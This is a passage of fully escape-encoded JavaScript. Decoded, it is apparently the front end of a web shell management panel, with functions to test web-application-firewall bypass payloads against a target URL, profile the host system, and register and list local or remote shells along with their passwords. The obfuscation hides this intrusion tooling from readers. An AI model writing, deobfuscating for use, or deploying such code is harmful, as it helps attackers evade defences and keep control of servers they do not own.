2f\x2f\40\x57\101\x46\x20\x42\171\x70\x61\163\163\x20\x54\145\163\x74\xa\11\11\x61\x73\171\156\143\40\167\x61\146\x42\171\x70\x61\163\x73\124\x65\x73\164\x28\51\x20\173\12\11\x9\11\x63\157\x6e\163\x74\x20\x74\141\162\x67\145\164\x55\x72\x6c\40\75\40\x64\x6f\143\165\155\x65\x6e\164\56\147\145\164\105\x6c\145\x6d\x65\x6e\164\102\x79\x49\x64\x28\47\x77\x61\146\x2d\164\x61\162\147\x65\x74\55\x75\162\x6c\x27\51\77\56\166\141\154\x75\145\40\x7c\174\x20\47\47\x3b\xa\x9\x9\11\x63\x6f\x6e\x73\x74\40\x70\x61\x79\154\157\141\144\x20\x3d\40\144\x6f\143\165\155\145\156\x74\56\x67\x65\164\105\154\x65\155\x65\156\164\x42\171\111\x64\50\x27\167\141\146\x2d\x70\141\x79\154\157\x61\x64\x27\x29\77\56\166\x61\x6c\x75\145\40\174\x7c\40\x27\x27\x3b\12\x9\x9\11\x63\157\156\163\164\x20\x74\145\143\x68\x6e\x69\x71\x75\145\x20\75\40\x64\x6f\x63\165\155\x65\156\x74\x2e\147\x65\x74\x45\x6c\x65\x6d\145\156\164\102\x79\x49\x64\50\x27\x77\x61\146\55\x74\145\143\150\156\151\x71\165\x65\47\x29\77\x2e\166\141\x6c\x75\145\x20\x7c\174\x20\47\141\154\x6c\x27\x3b\xa\11\11\x9\12\11\x9\11\x69\146\x20\50\x21\x74\x61\162\147\145\x74\x55\x72\x6c\x2e\x74\x72\x69\x6d\50\51\x20\174\174\x20\41\x70\x61\x79\x6c\x6f\141\144\x2e\x74\x72\151\155\x28\x29\51\x20\173\12\11\11\11\11\x74\x68\151\163\x2e\x74\157\x61\163\x74\50\x27\124\141\x72\147\145\x74\40\125\122\x4c\x20\141\x6e\x64\x20\160\141\x79\154\x6f\141\x64\40\141\162\x65\x20\162\x65\161\x75\x69\162\145\144\56\47\54\x20\x27\145\x72\162\x6f\162\x27\x29\x3b\xa\11\x9\11\11\11\x72\145\x74\x75\162\x6e\x3b\12\11\x9\11\x9\x7d\12\11\x9\11\xa\x9\x9\11\x63\157\156\163\164\40\x72\x65\x73\x75\x6c\164\163\x45\154\x20\75\40\x64\157\x63\165\155\x65\156\164\56\x67\145\x74\105\154\x65\155\x65\x6e\164\x42\171\x49\x64\x28\47\167\x61\146\55\142\x79\160\141\x73\163\55\x72\145\x73\x75\x6c\x74\163\47\x29\x3b\12\x9\11\11\151\146\40\50\x72\145\163\165\154\x74\163\105\x6c\51\40\x72\x65\x73\x75\154\x74\163\x45\154\x2e\x69\156\x6e\145\x72\x48\x54\115\114\40\x3d\40\47\74\x70\x20\x73\164\171\154\x65\75\42\x63\157\154\157\x72\x3a\x76\141\x72\50\55\x2d\x61\x63\x63\145\x6e\x74\x2d\147\157\154\144\51\73\x22\76\x54\x65\163\x74\x69\156\x67\40\x62\171\x70\141\x73\x73\x20\164\145\143\x68\156\151\161\x75\145\x73\x2e\x2e\56\x3c\57\x70\76\47\73\xa\x9\x9\11\xa\11\x9\x9\x63\157\156\163\164\x20\x72\x65\163\x20\x3d\x20\141\167\141\x69\164\x20\164\150\151\x73\x2e\141\160\151\50\x27\167\x61\x66\x5f\x62\x79\160\x61\x73\163\x5f\x74\x65\x73\164\47\54\40\173\x20\164\141\162\147\x65\164\137\165\162\x6c\x3a\x20\164\141\162\147\x65\164\x55\162\154\54\40\x70\x61\x79\154\157\141\144\72\x20\x70\141\x79\154\157\141\x64\54\x20\164\x65\x63\150\x6e\x69\161\165\x65\x3a\x20\164\145\x63\150\156\x69\x71\165\145\x20\x7d\51\73\12\x9\11\11\xa\x9\x9\x9\151\146\x20\50\x72\145\163\40\46\x26\40\162\x65\x73\x2e\163\164\x61\x74\x75\163\x20\x3d\75\75\x20\47\163\165\143\143\x65\163\x73\x27\51\x20\x7b\12\11\x9\11\x9\x6c\145\x74\x20\150\x74\155\x6c\40\x3d\40\x60\x3c\x64\151\166\40\163\164\171\x6c\x65\75\x22\160\141\x64\144\x69\156\147\72\x31\x35\x70\x78\x3b\40\x62\141\143\x6b\147\162\157\x75\156\144\72\166\x61\162\x28\x2d\55\x62\147\55\154\151\x67\150\164\x29\73\x20\x62\x6f\162\144\x65\162\x2d\x72\x61\x64\x69\x75\x73\x3a\x36\x70\x78\73\x20\x6d\x61\x72\147\151\x6e\x2d\142\157\164\164\157\x6d\x3a\61\162\145\155\x3b\x22\76\xa\11\11\x9\11\11\x3c\163\164\x72\157\x6e\x67\76\342\x9c\x85\x20\124\x65\163\x74\145\144\x20\x24\x7b\x72\145\163\56\164\157\x74\141\x6c\x5f\164\x65\x73\164\145\x64\175\x20\x74\x65\x63\150\x6e\x69\161\165\145\50\x73\51\74\57\x73\164\x72\x6f\x6e\x67\76\12\x9\x9\x9\x9\x3c\x2f\x64\x69\166\76\12\11\11\x9\11\74\164\141\142\154\x65\x20\x63\x6c\141\163\x73\x3d\x22\x72\x65\x73\165\154\164\163\x2d\164\x61\x62\154\145\42\40\163\x74\171\154\x65\x3d\42\x6d\141\x72\147\151\156\55\164\x6f\160\72\61\162\145\x6d\73\42\x3e\12\x9\11\11\11\11\74\x74\150\145\x61\144\76\x3c\164\162\76\74\164\150\x3e\x54\x65\x63\x68\156\x69\161\x75\145\x3c\x2f\164\x68\x3e\x3c\x74\150\x3e\x50\141\171\x6c\x6f\141\x64\x3c\57\164\150\x3e\74\164\x68\x3e\x48\124\x54\120\40\x43\x6f\144\145\x3c\57\x74\150\x3e\74\164\x68\76\102\x6c\x6f\x63\153\145\x64\74\x2f\164\150\x3e\74\x2f\164\x72\x3e\x3c\x2f\x74\150\145\141\x64\76\xa\11\x9\11\11\x9\x3c\164\142\157\144\171\x3e\x60\73\12\x9\11\x9\x9\12\11\x9\x9\x9\x72\145\163\56\x72\x65\x73\165\154\x74\163\x2e\146\157\x72\x45\x61\143\x68\50\162\x65\x73\x75\154\x74\x20\75\76\40\x7b\12\11\x9\x9\x9\11\x63\x6f\x6e\163\164\x20\x62\x6c\x6f\x63\x6b\145\144\40\75\x20\162\x65\x73\165\x6c\164\56\142\x6c\x6f\143\x6b\145\144\40\x3f\x20\47\xe2\x9d\214\x20\131\x65\163\47\x20\x3a\x20\x27\342\x9c\205\40\116\157\x27\73\12\11\11\11\11\x9\x68\x74\x6d\x6c\x20\x2b\75\40\140\74\164\162\76\12\11\11\11\11\x9\11\74\x74\144\76\x24\173\x74\x68\x69\x73\56\x65\163\x63\x61\160\x65\x48\164\155\x6c\50\162\x65\163\x75\x6c\164\56\x74\x65\143\150\x6e\x69\161\165\x65\51\175\74\x2f\x74\144\x3e\12\x9\x9\x9\11\11\11\x3c\x74\144\x20\163\164\171\154\x65\75\x22\x66\157\156\164\x2d\146\141\155\151\154\x79\72\x6d\157\x6e\x6f\x73\160\x61\143\x65\73\x20\146\157\156\164\x2d\x73\151\x7a\x65\x3a\x30\56\x38\x35\162\145\155\x3b\x20\167\157\x72\x64\x2d\x62\x72\x65\x61\x6b\72\142\162\145\x61\153\x2d\141\154\154\73\x22\x3e\44\173\x74\x68\151\x73\x2e\145\163\143\x61\160\145\x48\164\x6d\x6c\x28\x72\145\163\165\x6c\164\x2e\160\x61\x79\x6c\157\x61\x64\51\175\x3c\57\164\x64\x3e\xa\11\11\11\11\11\11\74\164\x64\76\44\173\x72\x65\x73\x75\154\x74\x2e\150\x74\164\160\x5f\x63\157\x64\145\x20\x7c\174\40\x27\x4e\57\101\47\175\x3c\x2f\x74\144\76\12\x9\x9\x9\11\11\11\74\164\x64\76\44\173\142\x6c\157\x63\x6b\145\144\175\x3c\57\x74\x64\x3e\xa\11\11\11\x9\x9\74\x2f\x74\x72\76\x60\73\12\x9\x9\x9\x9\175\x29\x3b\12\11\x9\11\x9\xa\11\11\x9\x9\150\164\155\x6c\x20\x2b\x3d\x20\x27\74\57\164\x62\157\144\x79\76\74\x2f\x74\141\142\x6c\145\x3e\47\x3b\12\x9\11\11\x9\12\x9\11\11\x9\x69\146\x20\50\x72\x65\163\165\x6c\x74\x73\x45\x6c\51\x20\x72\145\x73\x75\x6c\164\163\x45\154\56\151\156\156\x65\x72\110\x54\x4d\x4c\40\75\x20\x68\x74\x6d\154\x3b\12\11\x9\11\x9\x74\150\x69\163\56\164\x6f\141\163\164\50\140\124\145\x73\x74\145\x64\x20\44\x7b\x72\x65\163\56\x74\157\164\x61\154\137\164\x65\163\x74\145\x64\x7d\x20\164\x65\143\x68\x6e\x69\x71\x75\x65\x28\x73\51\140\x2c\x20\x27\x73\165\143\x63\145\x73\163\47\x29\x3b\12\x9\x9\11\x7d\40\x65\x6c\163\x65\40\173\12\11\11\x9\x9\x69\x66\x20\50\162\145\163\165\x6c\164\163\105\154\51\x20\x72\x65\163\165\x6c\x74\163\x45\154\x2e\151\156\156\x65\x72\110\x54\x4d\x4c\x20\x3d\x20\140\74\160\40\x73\x74\x79\154\145\75\42\143\157\x6c\x6f\162\x3a\x76\x61\162\x28\55\x2d\141\x63\143\145\156\164\55\162\145\144\x29\x3b\42\x3e\xe2\235\x8c\40\44\x7b\x72\x65\163\x3f\x2e\x6d\145\163\163\141\147\x65\40\x7c\x7c\40\47\x57\x41\x46\x20\x62\x79\x70\x61\x73\x73\40\x74\145\x73\164\40\146\x61\x69\x6c\x65\x64\56\x27\x7d\74\x2f\160\76\140\73\xa\11\11\11\x9\164\x68\151\163\x2e\164\x6f\141\163\164\x28\162\145\163\x3f\56\155\x65\x73\x73\141\x67\x65\40\174\x7c\40\x27\x57\101\x46\x20\x62\x79\160\x61\x73\163\40\164\145\163\x74\x20\146\141\x69\x6c\145\144\56\x27\54\40\x27\145\x72\162\x6f\162\x27\51\x3b\xa\x9\x9\x9\x7d\12\x9\11\175\54\12\x9\x9\xa\x9\11\x2f\x2f\x20\x53\x79\163\164\x65\x6d\x20\x50\x72\x6f\x66\151\154\x65\x72\12\x9\11\x61\163\171\x6e\143\x20\163\x79\163\164\x65\x6d\120\162\x6f\x66\x69\x6c\145\162\x28\x29\x20\173\12\11\x9\x9\x63\157\x6e\163\x74\40\160\162\x6f\146\x69\x6c\x65\124\171\x70\145\x20\x3d\40\144\157\143\x75\x6d\x65\x6e\164\x2e\x67\x65\x74\105\154\145\155\145\x6e\x74\102\x79\111\x64\x28\47\160\x72\157\x66\151\154\145\x72\55\x74\171\x70\145\x27\51\77\56\x76\141\154\x75\145\x20\x7c\174\40\x27\x66\x75\x6c\154\x27\x3b\12\x9\x9\11\12\11\x9\x9\143\157\x6e\x73\164\40\x72\x65\x73\165\x6c\x74\163\105\154\40\x3d\40\x64\157\143\x75\155\x65\156\x74\56\147\145\164\x45\x6c\145\x6d\145\x6e\164\x42\171\x49\x64\50\47\163\171\163\x74\x65\155\x2d\160\x72\157\x66\151\154\145\162\x2d\x72\x65\163\x75\x6c\x74\163\47\x29\73\12\11\11\11\x69\x66\x20\50\162\x65\x73\165\154\164\163\105\154\51\x20\162\145\x73\x75\x6c\164\x73\x45\x6c\56\x69\156\x6e\x65\162\110\x54\x4d\114\x20\x3d\x20\x27\x3c\x70\x20\x73\x74\171\x6c\145\75\42\x63\x6f\154\157\162\72\166\141\x72\50\x2d\x2d\141\143\143\145\x6e\164\x2d\147\x6f\154\x64\51\73\42\x3e\107\x61\x74\150\x65\162\x69\156\x67\40\163\x79\163\164\x65\155\x20\151\x6e\x66\x6f\x72\155\141\x74\151\157\x6e\56\x2e\56\74\57\x70\x3e\x27\73\12\x9\x9\11\12\x9\11\11\x63\x6f\156\x73\164\x20\x72\x65\163\40\75\x20\141\x77\141\151\x74\x20\164\x68\x69\163\56\141\x70\x69\x28\x27\163\171\x73\164\x65\x6d\x5f\160\162\x6f\146\x69\154\x65\x72\x27\x2c\x20\x7b\x20\x70\162\157\x66\151\x6c\145\x5f\164\x79\x70\x65\72\40\160\162\157\x66\x69\154\x65\x54\171\x70\145\x20\x7d\x29\73\12\x9\11\11\xa\11\x9\11\151\146\x20\x28\x72\145\163\x20\46\x26\40\x72\x65\163\x2e\163\x74\x61\164\165\x73\40\x3d\75\x3d\40\47\163\165\143\x63\x65\163\x73\47\51\40\x7b\xa\x9\x9\11\x9\154\x65\164\40\150\x74\x6d\x6c\40\x3d\x20\140\74\144\151\166\x20\163\x74\171\154\x65\75\42\160\x61\x64\x64\x69\156\147\72\61\x35\x70\x78\x3b\x20\x62\141\143\x6b\147\x72\x6f\165\156\x64\72\166\141\x72\x28\x2d\x2d\x62\x67\55\154\x69\147\150\x74\x29\x3b\40\x62\x6f\162\x64\145\162\x2d\x72\141\144\151\165\163\x3a\x36\x70\170\x3b\x20\x6d\141\162\147\x69\156\55\142\x6f\164\164\157\155\x3a\x31\162\x65\x6d\x3b\x22\x3e\xa\x9\x9\11\x9\11\x3c\x73\164\x72\x6f\156\147\76\xe2\234\x85\40\123\171\x73\x74\145\155\x20\160\162\x6f\x66\x69\x6c\145\x20\x67\x65\x6e\145\x72\141\x74\x65\x64\40\x61\164\x20\x24\173\x72\145\163\56\x74\151\x6d\x65\x73\x74\141\155\160\x7d\x3c\x2f\x73\x74\x72\157\156\147\x3e\xa\11\x9\x9\x9\74\x2f\144\151\166\76\xa\x9\11\11\x9\74\160\x72\x65\x20\x63\x6c\x61\x73\x73\75\42\x6f\165\164\160\x75\x74\x2d\142\157\x78\x22\x20\163\164\x79\154\145\x3d\x22\155\141\170\55\150\x65\151\147\150\164\72\x36\60\60\x70\170\73\40\157\166\x65\x72\146\154\157\x77\x2d\171\72\x61\165\x74\x6f\73\x22\76\44\x7b\x4a\123\x4f\116\x2e\x73\164\162\x69\156\147\151\x66\171\50\162\x65\x73\x2e\160\162\x6f\x66\x69\154\x65\54\40\156\x75\x6c\x6c\54\x20\62\51\x7d\x3c\x2f\160\x72\145\x3e\140\73\12\x9\11\x9\11\xa\x9\11\x9\11\x69\x66\40\50\x72\145\163\x75\154\x74\x73\x45\x6c\x29\40\x72\x65\x73\x75\154\x74\163\105\x6c\x2e\151\156\156\145\162\110\x54\x4d\x4c\40\x3d\x20\x68\164\155\154\x3b\12\11\11\11\x9\164\x68\151\163\56\x74\x6f\141\x73\164\50\47\123\x79\x73\x74\145\155\40\160\162\x6f\146\151\154\145\x20\x67\145\156\145\x72\x61\x74\145\144\x21\x27\54\40\x27\x73\x75\x63\143\x65\x73\x73\47\51\x3b\12\x9\x9\11\x7d\40\145\154\163\145\40\x7b\12\11\x9\11\x9\151\146\x20\50\162\x65\x73\165\154\164\x73\x45\154\51\40\x72\x65\163\165\154\164\x73\105\154\x2e\x69\x6e\x6e\x65\162\110\x54\115\114\x20\x3d\x20\x60\x3c\x70\40\x73\164\x79\x6c\145\x3d\x22\143\157\154\157\162\x3a\166\141\162\50\x2d\x2d\x61\x63\143\x65\x6e\x74\55\162\145\x64\51\73\x22\x3e\xe2\235\x8c\x20\44\173\x72\145\163\77\x2e\x6d\145\163\x73\141\x67\145\40\174\x7c\40\47\106\141\151\154\145\144\40\164\x6f\x20\x67\x65\156\145\162\141\x74\145\40\163\x79\163\164\x65\x6d\40\x70\162\157\x66\x69\x6c\x65\x2e\47\175\x3c\x2f\x70\x3e\140\73\12\11\11\x9\x9\x74\x68\151\x73\x2e\164\157\141\163\164\50\162\145\x73\77\56\x6d\145\163\x73\x61\147\145\x20\x7c\174\x20\x27\106\x61\151\154\x65\x64\40\x74\x6f\x20\147\x65\x6e\145\162\141\x74\x65\40\163\171\163\164\x65\155\40\x70\x72\x6f\x66\x69\154\x65\x2e\47\x2c\x20\x27\x65\x72\162\157\162\x27\x29\x3b\12\11\x9\x9\x7d\12\11\x9\175\54\xa\11\11\xa\11\11\57\x2f\x20\115\165\x6c\164\151\55\x53\150\x65\x6c\154\40\x4d\x61\x6e\x61\147\145\x6d\145\156\x74\12\x9\x9\141\x73\x79\x6e\143\40\162\x65\147\x69\x73\x74\x65\162\x53\x68\x65\x6c\154\x28\x29\40\x7b\12\11\11\x9\143\x6f\x6e\x73\164\40\151\x73\122\145\x6d\x6f\x74\x65\40\x3d\40\144\157\x63\165\x6d\x65\156\x74\x2e\x67\145\x74\105\x6c\x65\155\145\156\164\x42\x79\111\x64\x28\47\162\145\147\x69\163\x74\145\162\55\151\163\55\x72\145\155\x6f\164\x65\x27\x29\x3f\x2e\143\x68\145\x63\x6b\145\144\x20\174\174\40\146\141\x6c\x73\145\x3b\xa\x9\11\x9\xa\11\x9\11\x6c\x65\x74\40\x73\x68\x65\x6c\x6c\120\141\164\150\x20\x3d\x20\x27\x27\73\12\x9\11\x9\154\145\x74\x20\x73\x68\145\154\x6c\x4e\x61\155\x65\40\x3d\40\47\x27\73\12\11\11\x9\x6c\145\164\x20\163\x68\x65\x6c\154\x50\141\163\163\167\157\x72\x64\x20\75\40\x27\x27\73\xa\11\11\11\154\145\164\40\162\x65\x6d\x6f\164\145\x55\x72\154\40\x3d\40\47\x27\x3b\xa\11\11\11\xa\11\11\x9\151\x66\40\50\x69\x73\122\145\155\157\164\x65\x29\x20\x7b\12\x9\x9\11\x9\x72\145\155\x6f\x74\145\125\162\x6c\x20\x3d\40\x64\157\x63\x75\x6d\x65\156\x74\x2e\x67\145\164\x45\x6c\145\155\x65\156\164\102\x79\x49\144\50\x27\162\x65\x67\151\x73\x74\x65\162\55\162\145\155\157\x74\145\55\165\x72\x6c\x27\51\x3f\x2e\x76\x61\x6c\165\x65\40\174\x7c\x20\x27\47\73\12\11\11\11\x9\x73\x68\x65\154\x6c\116\x61\155\x65\x20\75\x20\144\157\143\165\x6d\x65\x6e\164\x2e\x67\145\x74\105\154\x65\x6d\145\156\164\102\171\x49\x64\x28\47\162\x65\147\151\x73\164\145\x72\55\162\x65\x6d\157\164\145\x2d\156\x61\155\x65\47\51\x3f\56\166\x61\x6c\x75\145\40\174\x7c\40\x27\x27\x3b\xa\11\11\x9\x9\x73\150\x65\154\154\x50\141\163\x73\167\157\x72\144\40\75\x20\144\157\x63\x75\x6d\x65\156\164\x2e\147\x65\x74\x45\x6c\x65\x6d\x65\x6e\164\102\171\x49\144\x28\x27\x72\x65\147\x69\163\x74\x65\162\x2d\x72\145\x6d\157\164\145\55\160\x61\x73\x73\x77\157\x72\144\x27\51\77\56\166\141\154\x75\145\x20\174\174\40\47\47\x3b\12\11\x9\x9\x9\12\x9\11\x9\x9\151\146\40\50\x21\162\x65\155\157\x74\x65\125\162\154\56\164\x72\151\x6d\50\51\51\40\x7b\12\11\x9\11\x9\x9\x74\x68\x69\x73\x2e\x74\x6f\141\163\x74\x28\x27\122\145\x6d\157\x74\145\40\163\x68\x65\154\x6c\40\x55\x52\x4c\x20\151\163\x20\162\145\x71\x75\151\x72\x65\144\56\x27\54\x20\x27\x65\x72\162\157\162\47\x29\73\12\11\x9\11\11\11\x72\145\x74\x75\x72\x6e\73\xa\x9\11\x9\11\175\12\11\11\11\x7d\40\145\x6c\163\x65\x20\x7b\xa\11\x9\x9\11\x73\x68\x65\154\x6c\x50\x61\164\x68\x20\x3d\40\144\157\x63\165\x6d\x65\x6e\x74\x2e\x67\145\x74\105\x6c\x65\155\x65\156\164\x42\171\x49\x64\50\47\x72\145\x67\x69\163\x74\x65\x72\55\163\x68\x65\x6c\154\x2d\160\x61\164\x68\x27\x29\77\x2e\x76\x61\x6c\x75\x65\x20\x7c\x7c\x20\x27\x27\x3b\12\11\11\x9\x9\x73\x68\x65\154\154\116\141\155\x65\40\75\40\144\x6f\x63\x75\x6d\x65\156\164\x2e\x67\x65\164\x45\154\145\155\145\156\164\x42\171\111\144\50\x27\x72\x65\147\151\x73\x74\145\x72\x2d\x73\x68\145\x6c\154\55\156\x61\155\x65\x27\x29\x3f\56\166\x61\x6c\x75\145\x20\174\x7c\x20\x27\47\x3b\12\11\x9\11\11\x73\x68\x65\x6c\x6c\x50\141\163\x73\x77\157\162\x64\x20\x3d\x20\x64\x6f\x63\165\x6d\145\x6e\164\56\147\x65\164\105\154\145\155\145\x6e\164\102\171\x49\x64\50\x27\x72\145\147\x69\x73\x74\145\x72\x2d\163\150\x65\x6c\x6c\55\160\141\x73\163\x77\157\x72\144\x27\x29\x3f\56\166\141\154\x75\145\x20\x7c\174\x20\47\x27\73\xa\11\11\x9\x7d\12\x9\x9\11\12\11\x9\x9\143\157\156\x73\164\40\x72\145\163\x75\154\x74\163\105\x6c\40\x3d\40\144\x6f\x63\165\155\145\x6e\164\x2e\x67\145\164\105\x6c\145\155\x65\x6e\164\x42\171\111\144\50\47\x72\145\147\x69\163\164\145\x72\x2d\x73\x68\145\154\154\55\x72\x65\x73\x75\154\x74\163\x27\51\73\xa\11\x9\11\x69\x66\40\50\162\145\163\x75\154\x74\163\x45\154\51\40\162\x65\163\165\154\164\163\x45\154\x2e\x69\x6e\156\145\x72\110\124\115\x4c\40\75\x20\x27\x3c\x70\40\163\164\x79\x6c\145\75\42\x63\157\x6c\x6f\x72\x3a\166\141\x72\50\x2d\x2d\141\143\x63\145\x6e\164\55\147\157\x6c\x64\51\x3b\42\x3e\x52\x65\x67\151\x73\164\x65\x72\x69\x6e\x67\40\x73\x68\145\x6c\154\x2e\56\x2e\74\57\160\x3e\47\x3b\xa\x9\11\11\12\x9\11\11\x63\157\x6e\163\164\x20\x72\x65\163\40\x3d\x20\141\167\x61\151\x74\40\x74\150\151\163\56\141\160\x69\50\x27\x6d\165\x6c\164\x69\x5f\x73\150\x65\154\x6c\x5f\162\145\147\151\163\x74\145\x72\x27\x2c\x20\173\x20\xa\x9\x9\x9\x9\x73\x68\x65\x6c\x6c\137\x70\x61\x74\x68\x3a\40\x73\x68\x65\x6c\x6c\120\141\x74\150\x2c\x20\12\11\11\11\11\163\150\x65\x6c\x6c\x5f\x6e\141\x6d\145\x3a\x20\x73\x68\145\154\x6c\116\x61\x6d\145\54\40\xa\11\11\11\x9\x73\x68\145\154\154\137\x70\141\163\x73\167\157\162\x64\x3a\x20\x73\150\145\x6c\x6c\x50\141\163\163\167\x6f\x72\144\54\xa\11\11\x9\11\162\x65\x6d\157\164\x65\137\165\162\x6c\72\x20\x72\145\x6d\x6f\x74\145\125\x72\154\xa\x9\x9\x9\x7d\x29\x3b\12\11\11\11\12\11\x9\x9\x69\x66\40\x28\x72\145\163\x20\x26\x26\40\162\x65\163\x2e\163\164\141\x74\x75\x73\x20\75\75\75\40\x27\163\x75\x63\x63\x65\163\163\47\51\x20\x7b\12\x9\11\11\11\x69\x66\x20\50\x72\145\163\165\154\164\163\x45\154\51\40\x7b\xa\11\x9\11\x9\11\x72\x65\x73\165\154\164\163\105\x6c\56\x69\x6e\156\145\x72\110\124\115\114\40\75\x20\x60\x3c\x64\x69\x76\40\x73\164\171\x6c\x65\75\42\160\x61\144\x64\151\156\147\72\61\65\x70\x78\x3b\x20\142\141\x63\x6b\147\x72\x6f\x75\156\x64\72\x76\141\x72\50\55\55\x62\147\x2d\x6c\151\147\x68\164\51\73\40\x62\157\162\x64\145\162\55\162\141\144\x69\165\x73\72\x36\x70\170\x3b\x22\x3e\12\x9\11\11\11\x9\11\74\x73\x74\x72\x6f\x6e\147\76\342\x9c\x85\x20\x53\x68\x65\154\154\x20\x72\145\147\151\x73\164\145\162\x65\x64\40\x73\x75\x63\x63\x65\x73\163\x66\x75\154\154\171\x21\74\x2f\163\x74\x72\157\x6e\x67\76\x3c\142\x72\x3e\xa\x9\x9\11\x9\11\11\x3c\163\160\141\156\x20\x73\164\x79\x6c\145\75\x22\x63\157\x6c\157\x72\x3a\166\141\x72\50\55\55\164\x65\x78\164\55\x6d\145\x64\x29\73\x22\x3e\x53\150\x65\154\x6c\x20\111\104\72\40\x24\x7b\162\x65\163\56\163\150\x65\x6c\x6c\x5f\x69\x64\x7d\x3c\x2f\163\x70\x61\156\x3e\74\x62\162\x3e\xa\x9\11\x9\11\11\11\x3c\163\160\141\156\x20\x73\164\171\154\x65\75\x22\143\x6f\x6c\x6f\x72\72\x76\x61\162\x28\x2d\55\x74\145\x78\x74\x2d\x6d\x65\144\51\73\x22\x3e\124\171\160\145\72\40\x24\x7b\151\163\122\x65\x6d\x6f\x74\x65\40\77\x20\47\360\237\214\x90\x20\x52\145\x6d\x6f\x74\x65\x27\40\x3a\x20\x27\360\x9f\222\xbb\40\x4c\157\x63\x61\154\47\175\74\x2f\x73\x70\x61\156\76\12\11\11\x9\x9\x9\74\x2f\x64\x69\166\x3e\x60\x3b\xa\11\11\x9\x9\x7d\12\x9\11\x9\11\164\150\151\163\x2e\x74\157\141\x73\164\x28\x27\123\150\x65\x6c\x6c\x20\162\x65\147\x69\163\164\x65\x72\145\144\40\x73\165\x63\143\145\163\x73\146\165\x6c\154\x79\41\47\54\x20\47\x73\165\143\x63\145\163\x73\x27\x29\73\12\11\x9\11\x7d\x20\x65\x6c\163\x65\40\173\12\x9\x9\11\x9\x69\146\40\x28\162\x65\163\165\x6c\164\163\x45\x6c\x29\40\162\145\x73\165\154\164\163\x45\x6c\56\151\156\156\145\x72\x48\x54\x4d\114\40\75\40\140\x3c\x70\x20\163\x74\171\154\x65\75\x22\143\x6f\x6c\157\162\x3a\166\141\162\x28\55\55\141\143\x63\x65\x6e\164\55\x72\x65\x64\x29\73\x22\76\xe2\x9d\x8c\x20\44\x7b\162\x65\163\x3f\56\155\145\x73\x73\x61\x67\145\x20\x7c\174\40\x27\106\141\x69\x6c\145\x64\40\x74\157\x20\162\145\x67\151\163\x74\145\x72\x20\x73\150\145\154\x6c\56\x27\175\x3c\x2f\x70\x3e\x60\73\12\11\11\x9\x9\164\x68\151\x73\x2e\x74\157\141\x73\164\x28\162\145\163\x3f\x2e\x6d\145\163\163\141\x67\145\x20\174\174\x20\47\x46\x61\x69\154\145\144\40\x74\157\40\162\x65\147\x69\x73\164\145\x72\40\163\150\145\154\x6c\x2e\47\x2c\x20\x27\145\162\162\157\x72\47\51\x3b\12\11\x9\x9\175\12\x9\x9\x7d\54\xa\x9\x9\xa\11\11\x61\x73\x79\x6e\143\x20\x6c\151\x73\x74\123\x68\145\x6c\x6c\163\50\x29\x20\x7b\xa\x9\x9\11\143\157\x6e\x73\x74\x20\162\x65\x73\165\154\164\x73\105\x6c\x20\x3d\x20\x64\x6f\x63\x75\155\145\156\x74\x2e\x67\x65\x74\x45\154\x65\x6d\145\156\x74\102\171\x49\x64\50\x27\154\151\163\164\x2d\x73\150\x65\x6c\x6c\163\x2d\162\145\x73\165\x6c\164\163\x27\51\73\xa\11\11\x9\x69\146\40\50\x72\x65\x73\165\154\x74\163\105\154\51\x20\x72\x65\x73\165\x6c\x74\163\x45\x6c\56\x69\x6e\156\x65\162\110\x54\x4d\114\40\x3d\40\x27\74\160\x20\163\164\171\154\145\x3d\42\x63\157\x6c\157\x72\x3a\166\x61\x72\x28\x2d\x2d\141\x63\143\x65\x6e\164\55\x67\157\154\x64\51\73\x22\76\114\x6f\141\144\x69\156\x67\40\163\x68\x65\154\x6c\163\56\56\x2e\74\57\160\76\x27\x3b\xa\x9\11\11\xa\11\11\11\x63\157\156\x73\164\x20\162\x65\163\x20\x3d\x20\141\167\x61\151\164\x20\164\x68\151\163\56\x61\x70\x69\50\47\x6d\x75\154\x74\151\x5f\x73\x68\145\x6c\x6c\x5f\x6c\151\163\164\x27\x2c\40\173\x7d\x29\x3b\xa\11\11\11\xa\x9\x9\x9\151\146\40\x28\162\145\x73\x20\x26\46\40\162\x65\163\x2e\163\164\x61\x74\165\163\40\75\x3d\x3d\40\x27\x73\165\143\143\x65\163\163\x27\x29\x20\173\xa\11\11\x9\11\154\x65\164\x20\150\x74\155\x6c\40\x3d\40\140\x3c\144\x69\x76\x20\x73\x74\x79\x6c\x65\75\x22\x70\x61\144\x64\151\x6e\x67\72\x31\65\160\x78\x3b\x20\142\141\x63\x6b\x67\x72\157\165\x6e\x64\x3a\166\x61\x72\x28\x2d\55\x62\x67\x2d\154\x69\147\x68\x74\x29\x3b\40\142\x6f\162\x64\x65\x72\55\x72\x61\x64\x69\x75\x73\x3a\x36\x70\x78\73\x20\x6d\141\x72\147\151\156\55\x62\x6f\164\x74\157\x6d\x3a\x31\162\x65\x6d\x3b\42\x3e\xa\11\11\x9\x9\x9\x3c\163\164\x72\157\156\x67\76\xf0\x9f\223\x8b\40\106\x6f\x75\x6e\144\x20\x24\x7b\162\x65\163\56\164\x6f\x74\x61\154\175\40\x72\145\x67\x69\x73\x74\x65\x72\x65\144\x20\163\150\145\x6c\x6c\50\x73\x29\74\57\x73\x74\162\x6f\156\x67\x3e\12\x9\x9\11\x9\x3c\57\144\151\166\76\140\x3b\12\x9\11\11\11\xa\11\x9\11\11\x69\x66\40\x28\162\x65\163\x2e\163\150\145\154\x6c\x73\40\46\x26\x20\x4f\x62\152\145\143\164\56\x6b\145\x79\x73\50\162\x65\x73\56\x73\150\145\x6c\x6c\x73\x29\56\154\145\156\147\x74\x68\x20\x3e\x20\60\51\40\x7b\xa\x9\x9\x9\11\x9\150\x74\155\x6c\x20\x2b\75\x20\47\74\x74\x61\142\x6c\145\40\x63\154\141\x73\163\75\42\162\x65\163\x75\x6c\164\163\x2d\x74\x61\142\x6c\x65\x22\x3e\x3c\164\x68\x65\x61\x64\76\x3c\164\162\x3e\x3c\x74\150\x3e\x54\171\160\145\x3c\57\x74\x68\x3e\x3c\x74\150\x3e\x4e\x61\155\x65\x3c\x2f\164\150\x3e\74\x74\150\76\120\141\164\150\57\x55\122\x4c\x3c\57\164\x68\76\x3c\x74\150\x3e\x53\164\x61\164\x75\x73\x3c\57\164\150\x3e\74\164\x68\x3e\114\141\x73\164\x20\x53\x65\145\156\x3c\x2f\164\x68\x3e\74\57\x74\x72\x3e\x3c\x2f\x74\x68\145\141\144\76\74\164\x62\157\x64\171\76\47\x3b\xa\x9\11\x9\x9\11\12\11\x9\11\x